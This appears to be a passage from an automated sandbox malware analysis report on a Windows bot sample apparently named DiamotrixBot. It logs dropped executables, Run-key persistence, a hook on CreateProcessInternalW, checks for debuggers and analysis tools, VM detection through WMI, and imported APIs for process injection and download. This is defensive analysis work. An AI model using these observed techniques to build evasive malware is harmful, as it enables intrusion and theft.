              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0198 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0190 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0180 push rbp; retf 5_2_0DFD019B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0178 push rbp; retf 5_2_0DFD017B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0170 push rsi; retf 5_2_0DFD0173
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFE0970 push r14; retf 5_2_0DFE0973
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0168 push rbp; retf 5_2_0DFD016B
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFD0168 push rbp; retf 5_2_0DFD019B
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-sysinfo-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\python38.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-profile-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-2-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-timezone-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-math-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-utility-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-handle-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-namedpipe-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-1.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-filesystem-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-interlocked-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-memory-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\libffi-7.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l2-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\_bz2.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-stdio-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\ucrtbase.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-util-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-heap-l1-1-0.dll
              Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-errorhandling-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-rtlsupport-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-localization-l1-2-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-environment-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\VCRUNTIME140.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\libcrypto-1_1.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-time-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-process-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-string-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-debug-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\unicodedata.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-datetime-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-runtime-l1-1-0.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe File created: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exe
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processenvironment-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\select.pyd
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-convert-l1-1-0.dll
              Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exe
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-heap-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-string-l1-1-0.dll
              Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\2D25.tmp.update.exe
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-locale-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-conio-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-libraryloader-l1-1-0.dll
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exe File created: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-2-0.dll
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exe Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Services

              Hooking and other Techniques for Hiding and Protection

              Source: C:\Windows\System32\audiodg.exe Key value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced Hidden
              Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessInternalW new code: 0xE9 0x90 0x00 0x07 0x75 0x5D
              Source: C:\Windows\explorer.exe Code function: 5_2_0DFA50E0 LoadLibraryA,GetProcAddress, then a run of repeated LoadLibraryA calls followed by a long run of repeated GetProcAddress calls, 5_2_0DFA50E0
              Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_10-1446
              Source: C:\Windows\System32\msiexec.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_10-1162
              Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_3-1146
              Source: C:\Windows\System32\svchost.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_3-1369
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_0-1458
              Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_9-1145
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_7-1439
              Source: C:\Users\user\Desktop\uFVgJVXaEU.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_0-1198
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeEvasive API call chain: CreateMutex,DecisionNodes,ExitProcessgraph_7-1195
              Source: C:\Windows\System32\audiodg.exeEvasive API call chain: CreateMutex,DecisionNodes,Sleepgraph_9-1456
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_DiskDrive
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCESSHACKER.EXE
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: PROCMON.EXE
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: X64DBG.EXE
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: AUTORUNS.EXE
              Source: uFVgJVXaEU.exeBinary or memory string: GETTHREADIDKERNEL32NTDLLISWOW64PROCESSKERNEL32ZEROX64DIAMOTRIXBOTMADE IN ALGERIA <3SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\RUNSOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\EXPLORER\STARTUPAPPROVED\STARTUPFOLDERGQGWZD.EXELOADLIBRARYAKERNEL32.DLLGETPROCADDRESSKERNEL32.DLLWCSCPYMSVCRT.DLLWCSCATMSVCRT.DLLWCSCMPMSVCRT.DLLWCSNCPYMSVCRT.DLLWCSLENMSVCRT.DLLSTRLENMSVCRT.DLLREALLOCMSVCRT.DLLFREEMSVCRT.DLLWCSSTRMSVCRT.DLLGETWINDOWSDIRECTORYWKERNEL32.DLLGETVOLUMEINFORMATIONWKERNEL32.DLLLSTRCATWKERNEL32.DLLSETFILEATTRIBUTESWKERNEL32.DLLCLOSEHANDLEKERNEL32.DLLGETVERSIONEXAKERNEL32.DLLDELETEFILEWKERNEL32.DLLCREATEDIRECTORYAKERNEL32.DLLGETFILEATTRIBUTESAKERNEL32.DLLGETMODULEFILENAMEAKERNEL32.DLLCOPYFILEAKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLCREATEFILEAKERNEL32.DLLHEAPALLOCKERNEL32.DLLGETPROCESSHEAPKERNEL32.DLLEXPANDENVIRONMENTSTRINGSWKERNEL32.DLLRESUMETHREADKERNEL32.DLLSETTHREADCONTEXTKERNEL32.DLLRTLCOMPAREMEMORYKERNEL32.DLLVIRTUALALLOCEXKERNEL32.DLLGETMODULEHANDLEAKERNEL32.DLLGETTHREADCONTEXTKERNEL32.DLLGETMODULEFILENAMEWKERNEL32.DLLVIRTUALPROTECTEXKERNEL32.DLLGETLASTERRORKERNEL32.DLLRELEASEMUTEXKERNEL32.DLLCREATEMUTEXAKERNEL32.DLLHEAPFREEKERNEL32.DLLWAITFORSINGLEOBJECTKERNEL32.DLLCREATETHREADKERNEL32.DLLCHECKREMOTEDEBUGGERPRESENTKERNEL32.DLLGETCURRENTPROCESSKERNEL32.DLLISDEBUGGERPRESENTKERNEL32.DLLEXITPROCESSKERNEL32.DLLDELETEFILEAKERNEL32.DLLPROCESS32NEXTWKERNEL32.DLLTERMINATEPROCESSKERNEL32.DLLOPENPROCESSKERNEL32.DLLPROCESS32FIRSTWKERNEL32.DLLCREATETOOLHELP32SNAPSHOTKERNEL32.DLLSETENDOFFILEKERNEL32.DLLLSTRCMPAKERNEL32.DLLWRITEPROCESSMEMORYKERNEL32.DLLREADPROCESSMEMORYKERNEL32.DLLGETFILESIZEKERNEL32.DLLWRITEFILEKERNEL32.DLLADJUSTTOKENPRIVILEGESADVAPI32.DLLOPENPROCESSTOKENADVAPI32.DLLLOOKUPPRIVILEGEVALUEWADVAPI32.DLLGETTOKENINFORMATIONADVAPI32.DLLCREATEFILEWKERNEL32.DLLSHGETFOLDERPATHWSHELL32.DLLSHGETFOLDERPATHASHELL32.DLLLSTRCATAKERNEL32.DLLSETFI
LEATTRIBUTESAKERNEL32.DLLSHGETKNOWNFOLDERPATHSHELL32.DLLFREELIBRARYKERNEL32.DLLMOVEFILEWKERNEL32.DLLGETFILESIZEEXKERNEL32.DLLGETWINDOWSDIRECTORYAKERNEL32.DLLGETVOLUMEINFORMATIONAKERNEL32.DLLGETTICKCOUNTKERNEL32.DLLWSPRINTFWUSER32.DLLWSPRINTFAUSER32.DLLVIRTUALALLOCKERNEL32.DLLREADFILEKERNEL32.DLLSLEEPKERNEL32.DLLVIRTUALFREEKERNEL32.DLLSETFILEPOINTERKERNEL32.DLLCREATEDIRECTORYWKERNEL32.DLLFINDFIRSTFILEWKERNEL32.DLLFINDNEXTFILEWKERNEL32.DLLFINDCLOSEKERNEL32.DLLCOPYFILEWKERNEL32.DLLWRITEFILEKERNEL32.DLLGETSYSTEMDIRECTORYWKERNEL32.DLLEXITPROCESSKERNEL32.DLLCREATEREMOTETHREADKERNEL32.DLLINTERNETOPENURLWWININET.DLLINTERNETREADFILEWININET.DLLHTTPQUERYINFOAWININET.DLLINTERNETOPENWWININET.DLLINTERNETCONNECTWWININET.DLLHTTPOPENREQUESTWWININET.DLLHTTPSENDREQUESTAWININET.DLLINTERNETCLOSEHANDLEWININET.DLLPATHISURLWSHLWAPI.DLLPATHCOMBINEWSHLWAPI.DLLPATHFINDFILENAMEWSHLWAPI.DLLSTRSTRASHLWAPI.DLLURLDOWNLOADTOFILEWURLMON.DLLCREATEPROCESSWKERNEL32.DLLSHELLEXECUTEWSHELL32.DLLGETMODULEFILENAMEWKERNEL32.DLLGETSHORTPATHNAMEWKERNEL32.DLLGETENVIRONMENTVARIABLEWKERNEL32.
              Source: uFVgJVXaEU.exe, svchost.exe, 2F409E82DCA61388941053.exe, audiodg.exe, msiexec.exeBinary or memory string: IDAQ.EXE
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: 2900000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeMemory allocated: 2650000 memory reserve | memory write watchJump to behavior
              Source: C:\Windows\explorer.exeCode function: 5_2_0DFA8400 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,5_2_0DFA8400
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeThread delayed: delay time: 922337203685477Jump to behavior
              Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 423Jump to behavior
              Source: C:\Windows\System32\svchost.exeWindow / User API: threadDelayed 846Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3732Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3145Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1498Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 1306Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 799Jump to behavior
              Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 796Jump to behavior
              Source: C:\Users\user\AppData\Local\Temp\F72F.tmp.ssg.exeWindow / User API: threadDelayed 2831Jump to behavior
              Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)graph_5-104490
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-sysinfo-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\python38.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-rtlsupport-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-profile-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-localization-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_hashlib.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-environment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-timezone-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\libcrypto-1_1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-math-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-time-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-handle-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-utility-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-namedpipe-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-process-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-console-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_ctypes.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\unicodedata.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-debug-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-datetime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processthreads-l1-1-1.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-runtime-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-filesystem-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-interlocked-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-processenvironment-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_socket.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-memory-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\select.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-file-l2-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_bz2.pydJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-stdio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-convert-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-string-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-util-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-heap-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-locale-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-crt-conio-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-libraryloader-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-synch-l1-2-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\api-ms-win-core-errorhandling-l1-1-0.dllJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI81442\_lzma.pydJump to dropped file
              Source: C:\Windows\explorer.exeEvasive API call chain: GetModuleFileName,DecisionNodes,Sleepgraph_5-103959
              Source: C:\Users\user\AppData\Roaming\2F409E82DCA61388941053\2F409E82DCA61388941053.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_7-1184
              Source: C:\Users\user\AppData\Local\Temp\21AB.tmp.zx.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_12-17693
              Source: C:\Windows\System32\audiodg.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_9-1134
              Source: C:\Windows\System32\msiexec.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_10-1151
